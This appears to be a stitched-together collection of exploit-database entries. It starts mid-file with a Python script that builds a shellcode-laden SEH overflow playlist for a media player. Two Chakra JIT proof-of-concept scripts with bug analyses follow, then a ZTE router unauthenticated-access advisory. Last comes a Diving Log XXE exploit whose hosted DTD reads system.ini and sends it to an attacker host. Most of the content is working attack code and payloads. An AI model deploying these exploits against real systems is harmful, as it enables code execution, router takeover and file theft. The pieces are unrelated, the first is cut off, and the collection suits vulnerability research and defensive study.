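# throughout so the file is written byte-for-byte under both Python 2 and
# Python 3 -- a plain str literal cannot be written to a file opened in
# 'wb' mode on Python 3, which is why the original only ran on Python 2.
shellcode = b""
shellcode += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
shellcode += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
shellcode += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
shellcode += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
shellcode += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
shellcode += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
shellcode += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
shellcode += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
shellcode += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
shellcode += b"\x47\x42\x39\x75\x34\x4a\x42\x39\x6c\x5a\x48\x33\x52"
shellcode += b"\x69\x70\x69\x70\x6d\x30\x31\x50\x53\x59\x79\x55\x30"
shellcode += b"\x31\x75\x70\x6f\x74\x72\x6b\x42\x30\x6e\x50\x52\x6b"
shellcode += b"\x4e\x72\x7a\x6c\x52\x6b\x4e\x72\x6a\x74\x44\x4b\x71"
shellcode += b"\x62\x6c\x68\x7a\x6f\x34\x77\x50\x4a\x6f\x36\x30\x31"
shellcode += b"\x4b\x4f\x74\x6c\x6d\x6c\x43\x31\x63\x4c\x7a\x62\x6e"
shellcode += b"\x4c\x4d\x50\x47\x51\x66\x6f\x6c\x4d\x79\x71\x55\x77"
shellcode += b"\x68\x62\x6a\x52\x31\x42\x31\x47\x42\x6b\x6e\x72\x6c"
shellcode += b"\x50\x64\x4b\x30\x4a\x4d\x6c\x62\x6b\x6e\x6c\x4c\x51"
shellcode += b"\x63\x48\x5a\x43\x6f\x58\x4b\x51\x48\x51\x72\x31\x62"
shellcode += b"\x6b\x71\x49\x4d\x50\x59\x71\x46\x73\x72\x6b\x6e\x69"
shellcode += b"\x7a\x78\x48\x63\x6c\x7a\x61\x39\x44\x4b\x6c\x74\x64"
shellcode += b"\x4b\x4b\x51\x37\x66\x70\x31\x69\x6f\x54\x6c\x39\x31"
shellcode += b"\x46\x6f\x5a\x6d\x79\x71\x58\x47\x4f\x48\x69\x50\x53"
shellcode += b"\x45\x6c\x36\x6d\x33\x43\x4d\x49\x68\x6d\x6b\x61\x6d"
shellcode += b"\x6c\x64\x51\x65\x58\x64\x72\x38\x72\x6b\x4f\x68\x4e"
shellcode += b"\x44\x39\x71\x46\x73\x4f\x76\x52\x6b\x4c\x4c\x30\x4b"
shellcode += b"\x34\x4b\x70\x58\x6d\x4c\x4d\x31\x58\x53\x64\x4b\x49"
shellcode += b"\x74\x64\x4b\x6b\x51\x38\x50\x75\x39\x6e\x64\x4b\x74"
shellcode += b"\x6e\x44\x31\x4b\x51\x4b\x6f\x71\x62\x39\x4f\x6a\x70"
shellcode += b"\x51\x49\x6f\x47\x70\x31\x4f\x51\x4f\x31\x4a\x54\x4b"
shellcode += b"\x6d\x42\x38\x6b\x34\x4d\x61\x4d\x30\x6a\x79\x71\x54"
shellcode += b"\x4d\x74\x45\x77\x42\x79\x70\x4d\x30\x69\x70\x30\x50"
shellcode += b"\x51\x58\x70\x31\x72\x6b\x42\x4f\x42\x67\x6b\x4f\x57"
shellcode += b"\x65\x35\x6b\x68\x70\x47\x45\x34\x62\x4f\x66\x62\x48"
shellcode += b"\x73\x76\x44\x55\x77\x4d\x43\x6d\x79\x6f\x6a\x35\x6d"
shellcode += b"\x6c\x7a\x66\x31\x6c\x69\x7a\x73\x50\x4b\x4b\x4b\x30"
shellcode += b"\x31\x65\x4a\x65\x57\x4b\x6d\x77\x4c\x53\x64\x32\x50"
shellcode += b"\x6f\x71\x5a\x4b\x50\x51\x43\x6b\x4f\x49\x45\x50\x63"
shellcode += b"\x31\x51\x50\x6c\x72\x43\x6e\x4e\x71\x55\x74\x38\x31"
shellcode += b"\x55\x6b\x50\x41\x41"

# Crafted playlist entry.  Layout, following the per-line comments:
#   "http://" + 301 filler bytes up to the SEH record, the 2-byte next-SEH
#   field, the 2-byte SEH handler (a pop/pop/ret address -- only two bytes
#   are supplied because, as the unicode_mixed encoder implies, the
#   application presumably widens the input to UTF-16 before the overflow),
#   a short alignment stub that rebuilds EAX from ESI and returns into it,
#   45 more filler bytes, then the payload.  The interleaved 0x41 bytes are
#   the usual Unicode-friendly padding for the stub's instructions.
buffer = b"http://"
buffer += b"\x41" * 301
buffer += b"\x61\x41"          # POPAD (NSEH)
buffer += b"\x0f\x47"          # P/P/R (SEH)
buffer += b"\x56\x41"          # PUSH ESI
buffer += b"\x58\x41"          # POP EAX
buffer += b"\x05\x07\x01\x41"  # ADD EAX, 0x1000700
buffer += b"\x2d\x04\x01\x41"  # SUB EAX, 0x1000400
buffer += b"\x50\x41"          # PUSH EAX
buffer += b"\xc3"              # RET
buffer += b"\x41" * 45
buffer += shellcode
# Pad to a fixed 1500 bytes so the overflow length is constant regardless
# of the payload size.
buffer += b"\x41" * (1500 - len(buffer))

# Write the playlist; the context manager guarantees the file is closed and
# flushed even if the write raises.  Opening player.m3u in the vulnerable
# player triggers the overflow.
with open("player.m3u", 'wb') as f:
    f.write(buffer)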
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1366
Here's a snippet of Inline::Optimize.
FOREACH_INSTR_EDITING(instr, instrNext, func->m_headInstr)
{
switch (instr->m_opcode)
{
case Js::OpCode::Label:
{
...
if (instr->AsLabelInstr()->m_isForInExit)
{
Assert(this->currentForInDepth != 0); // The PoC hits this
this->currentForInDepth--;
}
}
break;
case Js::OpCode::InitForInEnumerator:
if (!func->IsLoopBody())
{
this->currentForInDepth++;
}
break;
case Js::OpCode::CallI:
...
instrNext = builtInInlineCandidateOpCode != 0 ?
this->InlineBuiltInFunction(instr, inlineeData, builtInInlineCandidateOpCode, inlinerData, symThis, &isInlined, profileId, recursiveInlineDepth) :
this->InlineScriptFunction(instr, inlineeData, symThis, profileId, &isInlined, recursiveInlineDepth);
...
}
}
"InlineBuiltInFunction" and "InlineScriptFunction" are used to inline a JavaScript function. For example, those methods can convert a call expression as follws.
Before:
s6.var = StartCall 1 (0x1).i32 #0000
arg1(s7)<0>.var = ArgOut_A s2.var, s6.var #0003
CallI s3.var, arg1(s7)<0>.var #0006
s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<--- NEXT INSTRUCTION
After:
s6.var = StartCall 1 (0x1).i32 #0000
...
s12.var = InlineeStart s3.var, iarg1(s7)<24>.var #0006 Func # (#1.3), #4 obj.inlinee
s9[Object].var = Ld_A 0xXXXXXXXX (GlobalObject)[Object].var # Func # (#1.3), #4
s8.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #0000 Func # (#1.3), #4
StatementBoundary #0 #0002 Func # (#1.3), #4
StatementBoundary #-1 #0002 Func # (#1.3), #4
InlineeEnd 4 (0x4).i32, s12.var #0000 Func # (#1.3), #4
StatementBoundary #0 #000c
s0.var = Ld_A 0xXXXXXXXX (undefined)[Undefined].var #000c <<---- NEXT INSTRUCTION
As you can see, the inlinee is wrapped in InlineeStart and InlineeEnd. So, to handle the original next instruction in the following iterations, those methods must return the call instruction's next instruction. But there is a buggy call flow.
Here's the call flow.
Inline::InlineBuiltInFunction(...) {
...
if (inlineCallOpCode == Js::OpCode::InlineFunctionCall)
{
inlineBuiltInEndInstr = InlineCall(callInstr, inlineeData, inlinerData, symCallerThis, pIsInlined, profileId, recursiveInlineDepth);
return inlineBuiltInEndInstr->m_next;
}
...
}
-> InlineCall -> InlineCallTarget ->
Inline::InlineCallApplyTarget_Shared(...) {
IR::Instr* instrNext = callInstr->m_next;
return InlineFunctionCommon(callInstr, originalCallTargetOpndIsJITOpt, originalCallTargetStackSym, inlineeData, inlinee, instrNext, returnValueOpnd, callInstr, nullptr, recursiveInlineDepth, safeThis, isApplyTarget);
}
Inline::InlineFunctionCommon(...)
{
...
return instrNext;
}
The point is that it ends up returning "callInstr->m_next->m_next" (InlineFunctionCommon returns callInstr->m_next, and InlineBuiltInFunction then returns that instruction's m_next). Therefore "callInstr->m_next" will never be processed by the loop.
In the PoC, "InitForInEnumerator" will be skipped.
s16[LikelyUndefined_CanBeTaggedValue].var = CallI s6.var, arg2(s15)<8>.var #0015 << will be inlined
InitForInEnumerator s16.var, s17.u64 #001f << Skipped
PoC:
*/
// Hot function: main() calls it 10000 times so it gets JIT-compiled with
// obj.inlinee.call({}) inlined.  Per the analysis above, inlining returns
// callInstr->m_next->m_next, so the InitForInEnumerator that immediately
// follows each inlined CallI is skipped.  Two for-in loops are used;
// presumably the missed InitForInEnumerator leaves currentForInDepth at 0
// when a for-in exit label is processed, which is the Assert noted in
// Inline::Optimize above -- confirm against the IR dump.
function opt(obj) {
for (let i in obj.inlinee.call({})) {
}
for (let i in obj.inlinee.call({})) {
}
}
// Driver: build the object once (so obj.inlinee is a stable inline
// candidate) and call opt() enough times (10000) for it to be JIT-compiled.
function main() {
let obj = {
inlinee: function () {
}
};
for (let i = 0; i < 10000; i++)
opt(obj);
}
// Entry point of the PoC.
main();
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1364
1.
In the Chakra's JIT compilation process, it stores variables' type information by basic block.
function opt(b) {
let o;
if (b) {
// BASIC BLOCK (a)
o = {};
} else {
// BASIC BLOCK (b)
o = 1.1;
}
// BASIC BLOCK (c)
return o;
}
For example, let's think the above code gets optimized. At the basic block (a), the type of "o" is always "Object". At the basic block (b), the type of "o" is always "CanBeTaggedValue_Float". At the basic block (c), it combines the two types, and marks the type of "o" as "CanBeTaggedValue_Mixed"(Object + CanBeTaggedValue_Float).
Explanation of TaggedValue in Chakra: http://abchatra.github.io/TaggedFloat/
But unlike variables, the type information of constants like numbers, strings is managed globally. This means, once a constant is marked as some type in a certain block. All blocks will treat it as that type regardless of the control flow.
2.
Chakra uses a BailOutOnTaggedValue bailout to ensure a variable's type is "Object". The bailouts can be generated when inlining JavaScript functions.
function opt(inlinee) {
inlinee();
}
Generated IR code for the above code:
StatementBoundary #0 #0000
s6.var = StartCall 1 (0x1).i32 #0000
BailOnNotObject s3[LikelyCanBeTaggedValue_Object].var #0006 Bailout: #0006 (BailOutOnInlineFunction)
s10.var = Ld_A [s3[LikelyObject].var+8].u64 #0006
BailOnNotEqual [s10.var!].i32, 26 (0x1A).i32 # Bailout: #0006 (BailOutOnInlineFunction)
BailOnNotEqual [s3[LikelyObject].var+40].u64, 0xXXXXXXXX (FunctionBody [Anonymous function (#1.3), #4]).u64 # Bailout: #0006 (BailOutOnInlineFunction)
As you can see after the "BailOnNotObject" opcode which generates "BailOutOnTaggedValue" bailouts, the type of "s3" becomes "LikelyObject" from "LikelyCanBeTaggedValue_Object". This means there's no case where "s3" is not an object after the opcode which ensures its type, so it's safe to use it as an object without checks after the opcode.
But the problem is that this can be applied to constants.
Here's the PoC.
*/
// Profiled target.  On the v > 0 path inlinee() is inlined, which emits a
// BailOnNotObject check on `inlinee` (see the IR above); on the else path
// the same value receives a property store.  When `inlinee` is a constant,
// the type narrowing recorded for the bailout applies globally rather than
// per basic block, so the else path also treats the constant as an object.
function opt2(inlinee, v) {
if (v > 0) {
inlinee();
} else {
inlinee.x = 1.1;
}
}
// Passes a float constant as the callee and null as v, so `null > 0` is
// false and the property-store path runs.  2.3023e-320 is a denormal
// double; presumably chosen so the value's raw bits, once confused with an
// object pointer, are attacker-controlled -- confirm.
function opt() {
opt2(2.3023e-320, null);
}
// Driver: first call opt2 with a real function so the profiler records an
// inlinable callee, then call opt() 10000 times to get it JIT-compiled with
// the constant-argument inlining described above.
function main() {
opt2(() => {}, 1); // feed a function to the profiler
for (let i = 0; i < 10000; i++) {
opt();
}
}
// Entry point of the PoC.
main();
/*
We can think of it in simplified form as follows:
(NOT PRECISE just for understanding)
Just after inlining:
// Basic block (a)
s2 = 2.30235E-320; // constant
inlinee = s2; // variable
if (null > 0) {
// Basic block (b)
BailOnNotObject(inlinee);
inlinee();
} else {
// Basic block (c)
inlinee.x = 1.1;
}
Type map:
Constants:
s2: CanBeTaggedValue_Float
Basic block (a):
inlinee: CanBeTaggedValue_Float
Basic block (b):
inlinee: CanBeTaggedValue_Float
Basic block (c):
inlinee: CanBeTaggedValue_Float
In the Global Optimization Phase:
// Basic block (a)
s2 = 2.30235E-320;
if (null > 0) {
// Basic block (b)
BailOnNotObject(s2);
s2();
} else {
// Basic block (c)
s2.x = 1.1;
}
Type map:
Constants:
s2: CanBeTaggedValue_Float -> Float
Basic block (a):
Basic block (b):
Basic block (c):
At the basic block (b), the BailOnNotObject opcode changes the type of "s2" to "Float". And since "s2" is a constant, that change affects the basic block (c). So it leads to type confusion at the basic block (c).
Note: a plain "Float" type (as opposed to CanBeTaggedValue_Float) is treated as an Object type here, which is why the store in basic block (c) proceeds on the constant without any further type check.
*/
# Exploit Title: ZTE ZXDSL 831 Unauthorized Configuration Access
# Date: 27/11/2017
# Exploit Author: Ibad Shah
# Vendor Homepage: zte.com.cn
# Software Link: -
# Version: - ZXDSL - 831CII
# Tested on: Windows 10
# CVE: CVE-2017-16953
=======================================
The router serves its HTML pages behind HTTP Basic Authentication; however,
the CGI handler does not apply the same protection to this file, so it is
exposed without authentication. A single GET request to the router gives a
remote attacker the opportunity to read and modify the router's PPPoE
configuration and set up malicious configuration, which could later be used
to disrupt the network and its activities.
Proof Of Concept
================
http://192.168.1.1/connoppp.cgi
[+] Exploit Title: Diving Log 6.0 XXE Injection
[+] Date: 27-11-2017
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://www.divinglog.de
[+] Software Link: http://www.divinglog.de/english/download/
[+] Disclosed at: https://thenopsled.com/divinglog.txt
[+] Version: 6.0
[+] Tested on: Windows 7 SP1, Windows 10
[+] CVE: CVE-2017-9095
==================
Background:
==================
Diving Log 6.0 is a scuba diving log software that manages and consolidates logs from other disparate sources. Many scuba diving log software programs export their data in an XML file.
==================
Vulnerability:
==================
By having a user import a crafted dive.xml file (very common, as many divers share logs), an attacker can trigger an XXE injection that reads local files from the victim's machine and sends them to an attacker-controlled host; the only user interaction required is importing the file.
1.)Open Diving Log 6.0
2.)Close "Welcome Center" popup and select "Import" from the bottom left corner
3.)Select "Subsurface" from the list of import data types.
4.)"Open File" and select the crafted dive.xml file (with listener open on ATTACKERS-IP)
==================
Proof of Concept:
==================
a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd). Note that dive.xml below fetches http://ATTACKERS-IP/payload.dtd without a port, i.e. on port 80, and the exfil entity in payload.dtd likewise sends to port 80: either run the listener on port 80 or add :9999 to both URLs so they match. Also note that the file contents are appended to a URL query string, so files containing newlines or characters that are invalid in a URL may fail to exfiltrate; small single-line targets such as system.ini work best.
b.) Hosted "payload.dtd"
<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">
c.) Exploited "dive.xml"
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP/payload.dtd">
%sp;
%param1;
%exfil;
]>
<divelog program='subsurface' version='3'>
<settings>
</settings>
<divesites>
<site uuid='33a32a07' name='hacked'>
</site>
</divesites>
<dives>
<dive number='1' divesiteid='33a32a07' date='2017-05-15' time='14:49:10' duration='46:00 min'>
<notes></notes>
<cylinder size='11.1 l' workpressure='207.0 bar' description='unknown' />
<divecomputer model='manually added dive'>
<depth max='15.0 m' mean='13.37 m' />
<surface pressure='1.013 bar' />
<sample time='0:00 min' depth='0.0 m' />
<sample time='3:00 min' depth='15.0 m' />
<sample time='40:00 min' depth='15.0 m' />
<sample time='42:00 min' depth='5.0 m' />
<sample time='45:00 min' depth='5.0 m' />
<sample time='46:00 min' depth='0.0 m' />
</divecomputer>
</dive>
</dives>
</divelog>
==================
Additional Attack Vectors:
==================
I tested and exploited the "subsurface" import option; however, many other dive log programs use XML and most are available as import options in Diving Log 6.0. The same XXE issue is therefore likely present in every import option whose underlying file format is XML-based (.UDCF and .UDDF, for example), although these were not individually verified.